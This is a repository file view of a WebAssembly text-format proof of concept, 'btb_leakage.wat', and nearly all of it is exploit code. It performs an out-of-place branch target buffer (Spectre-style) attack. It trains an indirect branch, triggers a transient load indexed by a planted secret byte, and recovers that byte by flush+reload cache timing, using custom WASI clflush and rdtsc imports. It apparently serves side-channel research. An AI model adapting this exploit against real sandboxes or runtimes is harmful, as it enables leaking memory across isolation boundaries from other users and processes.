-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathbtb_leakage.wat
303 lines (283 loc) · 10.3 KB
/
btb_leakage.wat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
;; basic out-of-place btb. The secret byte is 83("S")
;; linear memory usage:
;; [0, 12), [128, 140) - output parameter
;; [64, 72) - rdtsc timer
(module
(type (;0;) (func (result i32)))
(type (;1;) (func ))
(type (;2;) (func (param i32) (result i32)))
(type (;3;)$param32 (func (param i32)))
(import "wasi_snapshot_preview1" "clflush_guestaddr" (func $__wasi_clflush_guestaddr (type 2)))
(import "wasi_snapshot_preview1" "clflush_hostaddr" (func $__wasi_clflush_hostaddr (type 2)))
(import "wasi_snapshot_preview1" "fence" (func $__wasi_fence (type 0)))
(import "wasi_snapshot_preview1" "rdtsc" (func $__wasi_rdtsc (type 2))) ;;rdtsc expects a pointer-to-u64 and will write the tsc value to that location
(import "wasi_unstable" "fd_write" (func $writef (param $fd i32) (param $iovec i32) (param $len i32) (param $written i32) (result i32)))
(table (;0;) 4 anyfunc)
(elem (i32.const 0) $flush $fread $ftrain)
(memory (;0;) 2024 65535) ;; pages of 65536 bytes
;; the real version, 10000 iterations
(func $main (export "main") (local $total_times i32)(local $times i32)(local $cache_threshold i64)
(call $initializeMemory)
(call $warmup)
(call $getThreshold)
(set_local $cache_threshold)
(set_local $total_times (i32.const 1000000))
(loop $L0
;; (call $evict)
(call $fence)
(set_local $times (i32.const 100))
(loop $L1
(call $ftrain (i32.const 1))
(set_local $times (i32.sub (get_local $times) (i32.const 1)))
(br_if $L1 (get_local $times))
)
(call $flushLinearMemory)
(set_local $times (i32.const 10))
(loop $L2
(i32.const 2)
(i32.const 1)
(call_indirect (type $param32))
(get_local $cache_threshold)
(call $exfiltrate)
(set_local $times (i32.sub (get_local $times) (i32.const 1)))
(br_if $L2 (get_local $times))
)
(set_local $total_times (i32.sub (get_local $total_times) (i32.const 1)))
(br_if $L0 (get_local $total_times))
)
)
;; the training function needs to be careful to not touch(load) any linear memory
(func $ftrain (export "ftrain") (param $br_index i32) (local $taken_br_cond i32)
(set_local $taken_br_cond (i32.const 99))
(block
;; leave a signature on the BHB by doing enough taken conditional jumps. 35 seems to be good for both Ryzen and lakes
;; need to check if this gets compiled to taken branch by cranelift
(block
(block
(block
(get_local $br_index)
(br_table 0 1 2 2)
)
(i32.store (i32.const 4096)(i32.const 4096))
)
;; train the code to jump here (index 1)
(i32.load (i32.const 2000))
(i32.store (i32.const 83)) ;; just prevent optimization
)
(get_local $br_index)
(br_if 0 (i32.eq (i32.const 1)))
;; padding, should not be executed
(call $readTimer)
(drop)
)
(call $noopfunc)
(call $noopfunc)
)
(func $noopfunc (export "noopfunc")
)
(func $fread (export "fread") (param $br_index i32) (local $taken_br_cond i32)
;; identical to $ftrain up to the br_table
(set_local $taken_br_cond (i32.const 99))
(block
(block
(block
(block
(get_local $br_index)
(br_table 0 1 2 2)
)
(i32.store (i32.const 4096)(i32.const 4096))
)
;; transiently jump here
(i32.load (i32.const 339968)) ;; 339968=83*4096; assume "S"(83) is the secret byte
(i32.store (i32.const 83)) ;; just prevent optimization
)
;; normal control flow to exit function
;; empty noopcall which will be patched by debugging to flush
(get_local $br_index)
(br_if 0 (i32.eq (i32.const 2)))
;; prevent optimization
(call $readTimer)
(drop)
)
(call $noopfunc)
(call $noopfunc)
)
;; /////////////////////////////////////////////////////
;; Helper Functions
(func $exfiltrate (param $cache_threshold i64) (local $start_time i64) (local $end_time i64) (local $duration i64) (local $loop_index i32) (local $mix_i i32) (local $memory_index i32) (local $possible_result i32) (local $threshold i64)
;;
(set_local $possible_result (i32.const 256)) ;; initialized as an impossible result
(set_local $loop_index (i32.const 256))
(loop $L0
;; avoid prefetch; mix_i = (i * 167 + 13) & 255 ; the first mix_i should be 102 for i=255, btw
(set_local $loop_index (i32.sub (get_local $loop_index) (i32.const 1)))
(get_local $loop_index)
(i32.mul (i32.const 167))
(i32.add (i32.const 13))
(i32.and (i32.const 255))
(set_local $mix_i)
(get_local $mix_i)
(i32.mul (i32.const 4096))
(set_local $memory_index)
(get_local $memory_index)
;; (call $fence)
(call $readTimer)
(set_local $start_time)
;; (call $fence)
(i32.load)
(drop)
;; (call $fence)
(call $readTimer)
(set_local $end_time)
(i64.sub (get_local $end_time) (get_local $start_time))
(set_local $duration)
(block
(br_if 0 (i64.gt_u (get_local $duration) (get_local $cache_threshold)))
(call $output (get_local $mix_i))
(set_local $possible_result (get_local $mix_i))
)
(call $flush (get_local $memory_index))
(br_if $L0 (get_local $loop_index))
)
)
(func $readTimer (result i64)
;; call timer primitive, return i64
(call $__wasi_rdtsc (i32.const 64))
(drop)
(i64.load (i32.const 64))
)
(func $fence (type 1)
;; call fence primitive
(call $__wasi_fence)
(drop)
)
(func $flush (param $memory_index i32)
;; call flush primitive
(call $__wasi_clflush_guestaddr (get_local $memory_index))
(drop)
)
(func $flushLinearMemory (local $loop_counter i32)
(set_local $loop_counter (i32.const 256))
(loop $L1
(set_local $loop_counter (i32.sub (get_local $loop_counter) (i32.const 1)))
(call $flush (i32.mul (get_local $loop_counter) (i32.const 4096)))
(br_if $L1 (get_local $loop_counter))
)
)
(func $getThreshold (result i64) (local $loop_counter i32) (local $start_time i64) (local $end_time i64) (local $sum i64) (local $miss_time i64)
;; t_cachehit * 80% + t_cachemiss * 20%. Value below this threshold is considered cached access time
(set_local $loop_counter (i32.const 1000))
(set_local $sum (i64.const 0))
(call $flush (i32.const 8192))
(call $fence)
(call $readTimer)
(set_local $start_time)
;; (call $fence)
(i32.load (i32.const 8192))
(drop)
;; (call $fence)
(call $readTimer)
(set_local $end_time)
(i64.sub (get_local $end_time) (get_local $start_time))
(set_local $miss_time)
(loop $L0
;; (call $fence)
(call $readTimer)
(set_local $start_time)
;; (call $fence)
(i32.load (i32.const 8192))
(drop)
;; (call $fence)
(call $readTimer)
(set_local $end_time)
(i64.sub (get_local $end_time) (get_local $start_time))
(set_local $sum (i64.add (get_local $sum)))
(set_local $loop_counter (i32.sub (get_local $loop_counter) (i32.const 1)))
(br_if $L0 (get_local $loop_counter))
)
(i64.div_u (get_local $sum) (i64.const 1000))
(i64.mul (i64.const 80))
(get_local $miss_time)
(i64.mul (i64.const 20))
(i64.add)
(i64.div_u (i64.const 100))
(call $flush (i32.const 8192))
(call $printInt)
)
;; just output a single byte, better give it some char printable
(func $output (param $value i32)
;; the param is a printable byte
i32.const 0
i32.const 128
i32.store ;; put the parameter pointer in the linear memory. We store the parameter at 128
i32.const 128
get_local $value
i32.store ;; the parameter itself
i32.const 132
i32.const 10 ;; linefeed
i32.store
i32.const 136
i32.const 0
i32.store
i32.const 4 ;; iov_len
i32.const 2
i32.store
(call $writef (i32.const 1) (i32.const 0) (i32.const 1) (i32.const 8))
(drop)
)
(func $printInt (param $value i64) (result i64)
;; assume $value <= 9999: it'll only print 4 digits
(i64.div_u (get_local $value) (i64.const 1000))
(i64.add (i64.const 48))
(i32.wrap_i64)
(call $output)
(i64.rem_u (get_local $value) (i64.const 1000))
(i64.div_u (i64.const 100))
(i64.add (i64.const 48))
(i32.wrap_i64)
(call $output)
(i64.rem_u (get_local $value) (i64.const 100))
(i64.div_u (i64.const 10))
(i64.add (i64.const 48))
(i32.wrap_i64)
(call $output)
(i64.rem_u (get_local $value) (i64.const 10))
(i64.add (i64.const 48))
(i32.wrap_i64)
(call $output)
(get_local $value)
)
(func $warmup (local $loop_counter i32) (local $start_time i64) (local $end_time i64) (local $sum i64)
(set_local $loop_counter (i32.const 256))
(loop $L1
(set_local $loop_counter (i32.sub (get_local $loop_counter) (i32.const 1)))
(i32.load (i32.mul (get_local $loop_counter) (i32.const 4096)))
(drop)
(call $fence)
(call $flush (i32.mul (get_local $loop_counter) (i32.const 4096)))
(br_if $L1 (get_local $loop_counter))
)
(set_local $loop_counter (i32.const 10000))
(loop $L0
(call $readTimer)
(set_local $start_time)
(call $readTimer)
(set_local $end_time)
(i64.sub (get_local $end_time) (get_local $start_time))
(set_local $sum (i64.add (get_local $sum)))
(set_local $loop_counter (i32.sub (get_local $loop_counter) (i32.const 1)))
(br_if $L0 (get_local $loop_counter))
)
)
(func $initializeMemory (local $loop_counter i32)
(set_local $loop_counter (i32.const 256))
(loop $L0
(set_local $loop_counter (i32.sub (get_local $loop_counter) (i32.const 1)))
(i32.store (i32.mul (get_local $loop_counter) (i32.const 4096)) (get_local $loop_counter))
(call $fence)
(call $flush (i32.mul (get_local $loop_counter) (i32.const 4096)))
(br_if $L0 (get_local $loop_counter))
)
)
;; /////////////////////////////////////////////////////
(export "_start" (func $main)))